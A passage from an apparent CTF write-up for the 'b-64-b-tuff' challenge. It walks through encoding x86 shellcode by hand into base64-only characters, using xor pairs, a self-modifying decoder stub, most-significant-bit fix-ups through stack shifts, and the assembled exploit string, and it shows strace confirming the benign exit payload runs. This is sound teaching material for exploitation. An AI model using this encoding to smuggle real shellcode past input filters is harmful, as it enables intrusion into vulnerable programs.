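(1..3).each { |n| puts '0x%08x' % shifted_edx(0x80, n) }
```

That prints 0x00008000, 0x00800000 and 0x80000000: moving esp down by one byte before the pop drags one extra zero byte into the low end of the value, which is the same as shifting left by 8 bits.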

Putting it all together

You can take a look at how I do this in my final code. It's going to be a little different, because instead of using our xor trick to set edx to 0x7F, I instead push 0x7a / pop edx / increment 6 times. The only reason is that I didn't think of the xor trick when I was writing the original code, and I don't want to mess with it now.

But, we're going to do it the hard way: by hand! I'm literally writing this code as I write the blog (and, message from the future: it worked on the second try :) ).

Let's just stick with our simple exit-with-0x41414141-status shellcode:

mov eax, 0x01
mov ebx, 0x41414141
int 0x80

Which assembles to this, which is conveniently already a multiple of 4 bytes so no padding required:

00000000 b8 01 00 00 00 bb 41 41 41 41 cd 80 |......AAAA..|

Since we're doing it by hand, let's extract all the MSBs into a separate string (remember, this is all done programmatically usually):

00000000 38 01 00 00 00 3b 41 41 41 41 4d 00 |8....;AAAAM.|
00000000 80 00 00 00 00 80 00 00 00 00 80 80 |............|

If you xor those two strings together, you'll get the original string back.
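In Ruby, that split is just a pair of bitmasks per byte. Here's a minimal sketch (CODE, LOW, MSB and hex are names I made up for the example):

```ruby
# The original exit shellcode.
CODE = "\xb8\x01\x00\x00\x00\xbb\x41\x41\x41\x41\xcd\x80".b

LOW = CODE.bytes.map { |b| b & 0x7f }   # everything except the top bit
MSB = CODE.bytes.map { |b| b & 0x80 }   # only the top bit

# Hypothetical helper to print a byte array as hex.
def hex(bytes)
  bytes.map { |b| '%02x' % b }.join(' ')
end

puts hex(LOW)
puts hex(MSB)
puts LOW.zip(MSB).map { |l, m| l ^ m } == CODE.bytes
```

That prints 38 01 00 00 00 3b 41 41 41 41 4d 00, then 80 00 00 00 00 80 00 00 00 00 80 80, then true.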

First, let's worry about the first string. It's handled exactly the way we did the last example. We start by getting the three 32-bit values as little endian values:

38 01 00 00 -> 0x00000138

00 3b 41 41 -> 0x41413b00

41 41 4d 00 -> 0x004d4141

And then find the xor pairs to generate them just like before:

irb(main):061:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x00000138)
0x41414241 ^ 0x41414379

irb(main):062:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x41413b00)
0x6a6a4141 ^ 0x2b2b7a41

irb(main):063:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x004d4141)
0x41626a6a ^ 0x412f2b2b

But here's where the twist comes: let's take the MSB string above, and also convert that to little-endian integers:

80 00 00 00 -> 0x00000080

00 80 00 00 -> 0x00008000

00 00 80 80 -> 0x80800000

Now, let's try writing our decoder stub just like before, except that after decoding the MSB-free value, we're going to separately inject the MSBs into the code!

; Clear all registers
push 0x41414141
pop eax
xor eax, 0x41414141
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
popad

; Set ecx to 0x41410100 (0x41 bytes before the start of the encoded shellcode)
push 0x6a6a4241
pop eax
xor eax, 0x2b2b4341
push eax
pop ecx

; Decode the first 4 bytes
push 0x41414241
pop edx
xor [ecx+0x41], edx

; Set the MSB of the first byte (edx = 0x00000080)
push 0x41414146
pop eax
xor eax, 0x41414139
push eax
pop edx
inc edx
xor [ecx+0x41], edx

; Move ecx to the next 4 bytes
inc ecx
inc ecx
inc ecx
inc ecx

; Decode the second 4 bytes
push 0x6a6a4141
pop edx
xor [ecx+0x41], edx

; Set the MSB of the second byte (edx = 0x00008000)
push 0x41414146
pop eax
xor eax, 0x41414139
push eax
pop edx
inc edx
push edi
push edx
dec esp
pop edx
inc esp
xor [ecx+0x41], edx

; Move ecx to the next 4 bytes
inc ecx
inc ecx
inc ecx
inc ecx

; Decode the third 4 bytes
push 0x41626a6a
pop edx
xor [ecx+0x41], edx

; Set the MSB of the third byte (edx = 0x00800000)
push 0x41414146
pop eax
xor eax, 0x41414139
push eax
pop edx
inc edx
push edi
push edx
dec esp
dec esp
pop edx
inc esp
inc esp
xor [ecx+0x41], edx

; Set the MSB of the fourth byte (edx = 0x80000000)
push 0x41414146
pop eax
xor eax, 0x41414139
push eax
pop edx
inc edx
push edi
push edx
dec esp
dec esp
dec esp
pop edx
inc esp
inc esp
inc esp
xor [ecx+0x41], edx

; Padding
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
db 'AAAAAAAAAAAAAAAAAAAA'

; The second halves of our xor pairs
dd 0x41414379
dd 0x2b2b7a41
dd 0x412f2b2b

And that's it! Let's try it out! The code leading up to the padding assembles to:

00000000 68 41 41 41 41 58 35 41 41 41 41 50 50 50 50 50 |hAAAAX5AAAAPPPPP|
00000010 50 50 50 61 68 41 42 6a 6a 58 35 41 43 2b 2b 50 |PPPahABjjX5AC++P|
00000020 59 68 41 42 41 41 5a 31 51 41 68 46 41 41 41 58 |YhABAAZ1QAhFAAAX|
00000030 35 39 41 41 41 50 5a 42 31 51 41 41 41 41 41 68 |59AAAPZB1QAAAAAh|
00000040 41 41 6a 6a 5a 31 51 41 68 46 41 41 41 58 35 39 |AAjjZ1QAhFAAAX59|
00000050 41 41 41 50 5a 42 57 52 4c 5a 44 31 51 41 41 41 |AAAPZBWRLZD1QAAA|
00000060 41 41 68 6a 6a 62 41 5a 31 51 41 68 46 41 41 41 |AAhjjbAZ1QAhFAAA|
00000070 58 35 39 41 41 41 50 5a 42 57 52 4c 4c 5a 44 44 |X59AAAPZBWRLLZDD|
00000080 31 51 41 68 46 41 41 41 58 35 39 41 41 41 50 5a |1QAhFAAAX59AAAPZ|
00000090 42 57 52 4c 4c 4c 5a 44 44 44 31 51 41 |BWRLLLZDDD1QA|

We can verify it's all base64 by eyeballing it. We can also determine that it's 0x9d bytes long, which means to get to 0x141 we need to pad it with 0xa4 bytes (already included above) before the encoded data.

We can dump allll that code into a file, and run it with run_raw_code (don't forget to apply the patch from earlier to change the base address to 0x41410000, and don't forget to compile with -m32 for 32-bit mode):

$ nasm -o file file.asm
$ strace ./run_raw_code ./file
read(3, "hAAAAX5AAAAPPPPPPPPahABjjX5AC++P"..., 333) = 333
exit(1094795585) = ?
+++ exited with 65 +++

It works! And it only took me two tries (I missed the 'inc ecx' lines the first time :) ).

I realize that it's a bit inefficient to encode 3 lines into like 100, but that's the cost of having a limited character set!

Solving the level

Bringing it back to the actual challenge...

Now that we have working base 64 code, the rest is pretty simple. Since the app encodes the base64 for us, we have to take what we have and decode it first, to get the string that would generate the base64 we want.

Because base64 works in 4-character blocks and has padding, we're going to append a few meaningless bytes to the end. That way, if anything gets messed up by landing in a partial block, it's those filler bytes and not our code.

Here's the full "exploit", assembled:

hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/A

We're going to add a few 'A's to the end for padding (the character we choose is meaningless), and run it through base64 -d (adding '='s to the end until we stop getting decoding errors):
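The same step can be sketched in Ruby. This is just an illustration, not part of my tool: it rebuilds the exploit from the pieces above (the decoder stub, 0xa4 bytes of 'A' padding, and the three encoded dwords), tacks on six filler 'A's, and computes the '=' padding instead of finding it by trial and error.

```ruby
require 'base64'

# Decoder stub, copied row by row from the ASCII column of the hexdump.
decoder = %w[
  hAAAAX5AAAAPPPPP PPPahABjjX5AC++P YhABAAZ1QAhFAAAX 59AAAPZB1QAAAAAh
  AAjjZ1QAhFAAAX59 AAAPZBWRLZD1QAAA AAhjjbAZ1QAhFAAA X59AAAPZBWRLLZDD
  1QAhFAAAX59AAAPZ BWRLLLZDDD1QA
].join

# Stub + 0xa4 bytes of padding + the encoded payload (the three dd values).
exploit = decoder + 'A' * 0xa4 + 'yCAAAz++++/A'

# Add filler, then '=' until the length is a whole number of 4-char blocks.
padded = exploit + 'A' * 6
padded += '=' until (padded.length % 4).zero?

raw = Base64.strict_decode64(padded)
puts "#{padded.length} base64 characters -> #{raw.bytesize} bytes"
# 340 base64 characters -> 254 bytes

# Sanity check: re-encoding has to give back our shellcode (plus filler).
puts Base64.strict_encode64(raw).start_with?(exploit)
# true
```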

$ echo 'hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/AAAAAAA=' | base64 -d | hexdump -Cv
00000000  84 00 00 01 7e 40 00 00  0f 3c f3 cf 3c f3 da 84  |....~@...<..<...|
00000010  00 63 8d 7e 40 0b ef 8f  62 10 01 00 06 75 40 08  |.c.~@...b....u@.|
00000020  45 00 00 17 e7 d0 00 00  f6 41 d5 00 00 00 00 21  |E........A.....!|
00000030  00 08 e3 67 54 00 84 50  00 01 7e 7d 00 00 0f 64  |...gT..P..~}...d|
00000040  15 91 2d 90 f5 40 00 00  00 08 63 8d b0 19 d5 00  |..-..@....c.....|
00000050  21 14 00 00 5f 9f 40 00  03 d9 05 64 4b 2d 90 c3  |!..._.@....dK-..|
00000060  d5 00 21 14 00 00 5f 9f  40 00 03 d9 05 64 4b 2c  |..!..._.@....dK,|
00000070  b6 43 0c 3d 50 00 00 00  00 00 00 00 00 00 00 00  |.C.=P...........|
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000f0  03 20 80 00 0c fe fb ef  bf 00 00 00 00 00        |. ............|

Let's convert that into a string that we can use on the commandline by chaining together a bunch of shell commands:

echo -ne ' hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/AAAAAAA= ' | base64 -d | xxd -g 1 file | cut -b 10-57 | tr -d '

' | sed ' s/ /\\x/g ' \x84\x00\x00\x01\x7e\x40\x00\x00\x0f\x3c\xf3\xcf\x3c\xf3\xda\x84\x00\x63\x8d\x7e\x40\x0b\xef\x8f\x62\x10\x01\x00\x06\x75\x40\x08\x45\x00\x00\x17\xe7\xd0\x00\x00\xf6\x41\xd5\x00\x00\x00\x00\x21\x00\x08\xe3\x67\x54\x00\x84\x50\x00\x01\x7e\x7d\x00\x00\x0f\x64\x15\x91\x2d\x90\xf5\x40\x00\x00\x00\x08\x63\x8d\xb0\x19\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2d\x90\xc3\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2c\xb6\x43\x0c\x3d\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x20\x80\x00\x0c\xfe\xfb\xef\xbf\x00\x00\x00\x00\x00
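If chaining xxd, cut, tr and sed feels fragile, the same conversion is a one-liner in Ruby. This is only a sketch, and to_hex_escapes is a name I made up for the example:

```ruby
# Turn raw bytes into a \xNN string suitable for `echo -ne '...'`.
def to_hex_escapes(bytes)
  # Single quotes keep the backslash literal, so this emits \x84, not byte 0x84.
  bytes.each_byte.map { |b| format('\x%02x', b) }.join
end

# First six bytes of the decoded exploit, as seen in the hexdump.
puts to_hex_escapes("\x84\x00\x00\x01\x7e\x40".b)
# \x84\x00\x00\x01\x7e\x40
```

Unlike the shell pipeline, this emits exactly one escape per byte, so a short final row in the hex dump can't produce stray output.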

And, finally, feed all that into b-64-b-tuff:

$ echo -ne ' \x84\x00\x00\x01\x7e\x40\x00\x00\x0f\x3c\xf3\xcf\x3c\xf3\xda\x84\x00\x63\x8d\x7e\x40\x0b\xef\x8f\x62\x10\x01\x00\x06\x75\x40\x08\x45\x00\x00\x17\xe7\xd0\x00\x00\xf6\x41\xd5\x00\x00\x00\x00\x21\x00\x08\xe3\x67\x54\x00\x84\x50\x00\x01\x7e\x7d\x00\x00\x0f\x64\x15\x91\x2d\x90\xf5\x40\x00\x00\x00\x08\x63\x8d\xb0\x19\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2d\x90\xc3\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2c\xb6\x43\x0c\x3d\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x20\x80\x00\x0c\xfe\xfb\xef\xbf\x00\x00\x00\x00\x00 ' | strace ./b-64-b-tuff read ( 0 , " \204\0\0 \1 ~@ \0\0 \1 7< \363 \317 < \363 \332\204\0 c \215 ~@ \v \357\217 b \2 0 \1 \0 \6 u@ \1 0 " ..., 4096 ) = 254 write ( 1 , " Read 254 bytes!

" , 16Read 254 bytes ! ) = 16 write ( 1 , " hAAAAX5AAAAPPPPPPPPahABjjX5AC++P " ..., 340hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/ AAAAAAA = ) = 340 write ( 1 , "

" , 1 ) = 1 exit ( 1094795585 ) = ? +++ exited with 65 +++

And, sure enough, it exited with the status that we wanted! Now that we've encoded 12 bytes of shellcode, we can encode any amount of arbitrary code that we choose to!

Summary

So that, ladies and gentlemen and everyone else, is how to encode some simple shellcode into base64 by hand. My solution does almost exactly those steps, but in an automated fashion. I also found a few shortcuts while writing the blog that aren't included in that code.

To summarize:

Pad the input to a multiple of 4 bytes

Break the input up into 4-byte blocks, and find an xor pair that generates each value

Set ecx to a value that's 0x41 bytes before the encoded payload (the encoded payload is one half of each xor pair)

Put the other half of each xor pair in-line, loaded into edx and xor'd with the encoded payload

If any byte has its most significant bit set, set edx to 0x80 and use the stack to shift it into the right place to be inserted with a xor

After all the xors, add padding that's base64-compatible, but is effectively a no-op, to bridge between the decoder and the encoded payload

End with the encoded payload (the second half of the xor pairs)
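To make the xor-pair step concrete, here's a rough Ruby sketch of how a pair can be found for one 4-byte block. It is not the code from my tool; SET, xor_pair_for_byte and xor_pair_for_dword are names invented for this example, and it assumes the most significant bit of each byte is stripped off and fixed up separately, as described above.

```ruby
# Allowed bytes: A-Z, a-z, 0-9, '+' and '/'. Change this for alphanumeric.
SET = (('A'..'Z').to_a + ('a'..'z').to_a + ('0'..'9').to_a + ['+', '/']).map(&:ord)

# Find two bytes in SET whose xor is `byte` (MSB already cleared).
def xor_pair_for_byte(byte)
  SET.each do |a|
    b = a ^ byte
    return [a, b] if SET.include?(b)
  end
  nil
end

# Split a 32-bit value into two SET-only dwords, plus the positions of the
# bytes whose MSB has to be set afterwards with the 0x80 trick.
def xor_pair_for_dword(value)
  left = 0
  right = 0
  msb_positions = []
  4.times do |i|
    byte = (value >> (8 * i)) & 0xff
    msb_positions << i if byte & 0x80 != 0
    pair = xor_pair_for_byte(byte & 0x7f) or raise "no pair for 0x#{byte.to_s(16)}"
    left  |= pair[0] << (8 * i)
    right |= pair[1] << (8 * i)
  end
  [left, right, msb_positions]
end

# First block of the example shellcode: b8 01 00 00 (little-endian 0x000001b8).
left, right, msbs = xor_pair_for_dword(0x000001b8)
puts format('0x%08x ^ 0x%08x, MSB fix-ups at bytes %s', left, right, msbs.inspect)
# 0x41414241 ^ 0x41414379, MSB fix-ups at bytes [0]
```

With the set in that order, the sketch happens to land on the same values used in the hand-written decoder: 0x41414241 goes in-line and 0x41414379 goes at the end.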

When the code runs, it xors each pair, and writes it in-line to where the encoded value was. It sets the MSB bits as needed. The padding runs, which is an effective no-op, then finally the freshly decoded code runs.
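You can check that claim without running anything. The sketch below replays the decoder's arithmetic in Ruby using the constants from the hand-written example; ENCODED, KEYS and MSBS are names I picked for illustration.

```ruby
ENCODED = [0x41414379, 0x2b2b7a41, 0x412f2b2b]  # the trailing dd values
KEYS    = [0x41414241, 0x6a6a4141, 0x41626a6a]  # the values pushed and popped into edx
MSBS    = [[0], [1], [2, 3]]                    # byte positions fixed up with 0x80

decoded = ENCODED.each_with_index.map do |dword, i|
  dword ^= KEYS[i]                                   # xor [ecx+0x41], edx
  MSBS[i].each { |pos| dword ^= 0x80 << (8 * pos) }  # 0x80 shifted via the stack
  dword
end

shellcode = decoded.pack('V*')  # write each dword back little-endian
puts shellcode.unpack1('H*')
# b801000000bb41414141cd80
```

Those 12 bytes are mov eax, 1 / mov ebx, 0x41414141 / int 0x80, which is exactly the exit(0x41414141) that strace showed.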

It's complex, but hopefully this blog helps explain it!